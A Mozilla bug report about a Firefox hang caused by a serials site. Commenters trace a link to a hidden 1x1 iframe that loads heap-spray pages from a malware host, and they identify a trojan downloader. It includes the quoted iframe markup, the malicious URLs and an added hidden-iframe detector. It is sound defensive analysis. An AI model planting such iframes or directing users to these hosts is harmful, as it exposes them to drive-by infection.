Closed
Bug 320348
Opened 19 years ago
Closed 19 years ago
browser freezes because of an illegal script
Categories
(Core :: Security, defect)
RESOLVED
DUPLICATE
of bug 317334
People
(Reporter: fignamoya, Assigned: dveditz)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Browser freezes due to an illegal script on a page. This, in turn, causes all Firefox windows to close.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.serials.ws/all/?l=v&pn=3
2. Press Ctrl+F and search for 1301 on the page (javascript link to visual assist x... 1301)
3. Click on the link and observe how the browser runs CPU usage to 100%
Component: General → Layout
Product: Firefox → Core
QA Contact: general → layout
Version: 1.5 Branch → 1.8 Branch
Comment 1•19 years ago
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 ID:2005121500
I see this too.
In addition, this appears to disable the block popups option in the browser.
Component: Layout → JavaScript Engine
Comment 3•19 years ago
view-source:http://www.serials.ws/all/?l=v&pn=3
<a href=javascript:d(170307)>Visual Assist X 10.1.1301</a> :: 2005-04-30
http://www.serials.ws/serws.js
function d(id){
window.open('/d.php?n='+id,'Operate','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,width=650,height=550');
}
view-source:http://www.serials.ws/d.php?170307
this page contains an iframe:
<iframe src="http://toolbarurl.biz/dl/adv661.php" width=1 height=1></iframe>
the iframe loads:
view-source:http://toolbarurl.biz/dl/adv661.php
this in turn loads 8 iframes:
view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
and 1 iframe:
view-source:http://toolbarurl.biz/dl/bag.htm
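An added example, not part of the original bug report: a Python check that an analyst could run over saved HTML to flag 1x1 or hidden iframes such as the one quoted in comment 3, with each src resolved against the page URL. The pixel threshold, the result field names and the second (same-site) sample iframe are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: the iframe markup quoted in comment 3, plus one
# ordinary same-site iframe (hypothetical) added for contrast.
SAMPLE_PAGE_URL = "http://www.serials.ws/d.php?170307"
SAMPLE_HTML = """
<html><body>
<iframe src="http://toolbarurl.biz/dl/adv661.php" width=1 height=1></iframe>
<iframe src="/banner.html" width="468" height="60"></iframe>
</body></html>
"""
MAX_HIDDEN_PX = 2  # assumed threshold: frames this small are invisible to the user


def _px(value):
    """Return an integer pixel size, or None for missing or percentage values."""
    value = (value or "").strip().lower()
    if value.endswith("px"):
        value = value[:-2]
    return int(value) if value.isdigit() else None


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are effectively invisible to the user."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        w, h = _px(a.get("width")), _px(a.get("height"))
        style = (a.get("style") or "").replace(" ", "").lower()
        tiny = any(d is not None and d <= MAX_HIDDEN_PX for d in (w, h))
        hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or hidden:
            src = urljoin(self.page_url, a.get("src") or "")
            cross = urlsplit(src).hostname != urlsplit(self.page_url).hostname
            self.findings.append(
                {"src": src, "width": w, "height": h, "cross_site": cross})


def find_hidden_iframes(html, page_url):
    finder = HiddenIframeFinder(page_url)
    finder.feed(html)
    return finder.findings
```

Calling find_hidden_iframes(SAMPLE_HTML, SAMPLE_PAGE_URL) reports only the 1x1 cross-site frame; the fetched frame's own HTML can be fed back in to follow a nested chain from saved copies.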
Comment 4•19 years ago
Seen with the view-source: prefix, the URLs in comment 3 are harmless.
view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
fills the memory with 100000 times a return address, and then a short piece of code, 586 words.
Memory is filled by 8 iframes of this type, and the bag.html seems to be used to produce a crash, hopefully landing in one of those long regions leading to the exploit code.
A Google search for ADV661 shows it is a trojan:
http://sandbox.norman.no/live_2.html?logfile=437547
http://www.sophos.com/virusinfo/analyses/trojdownldrdl.html
If you've been on the site, read the reports to check if you are infected.
I don't want to try going to this site with js enabled.
I'm setting component to Security, so dveditz@cruzio.com can look if we are in danger, or if it's just a hang.
Assignee: nobody → dveditz
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → Security
Ever confirmed: true
QA Contact: layout → toolkit
Comment 5•19 years ago
Similar scripts used in
Bug 320760 Browser hangs at 100% CPU following document.write by malicious javascript
Bug 317334 hang when long wrappable string is passed to prompt() [e.g. as used in the exploit for IE's <body onload=window()> bug]
*** This bug has been marked as a duplicate of 317334 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE